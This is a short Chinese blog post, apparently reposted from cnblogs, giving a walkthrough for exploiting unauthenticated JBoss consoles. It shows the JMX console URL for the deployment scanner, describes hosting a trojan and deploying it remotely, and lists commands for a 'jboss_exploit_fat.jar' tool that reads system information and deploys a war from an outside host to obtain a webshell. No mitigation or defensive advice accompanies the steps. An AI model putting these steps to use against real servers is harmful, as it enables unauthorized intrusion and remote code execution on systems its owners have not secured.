首页 > Web开发 > 详细

WEB中间件--Jboss未授权访问,

时间:2018-04-26 13:48:22      阅读:311      评论:0      收藏:0      [点我收藏+]

1,Jboss未授权访问部署木马

发现存在Jboss默认页面,点进控制页
技术分享图片
点击 Jboss.deployment 进入应用部署页面
也可以直接输入此URL进入

http://www.ctfswiki.com:8080//jmxconsole/HtmlAdaptoraction=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL

技术分享图片
搭建远程木马服务器,可以用apache等web服务器来搭建,通过addurl参数进行木马的远程部署
技术分享图片
部署成功,访问木马地址
技术分享图片
最后附上一个jboss未授权访问EXP,备用,使用说明

1. 查看系统名称

java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName

2. 查看系统版本

java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion


3.远程部署war

java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://192.168.20.10/no.war

获得shell地址:
www.any.com:8080/no/index.jsp

技术分享图片

WEB中间件--Jboss未授权访问,

原文:https://www.cnblogs.com/hackxf/p/8951699.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!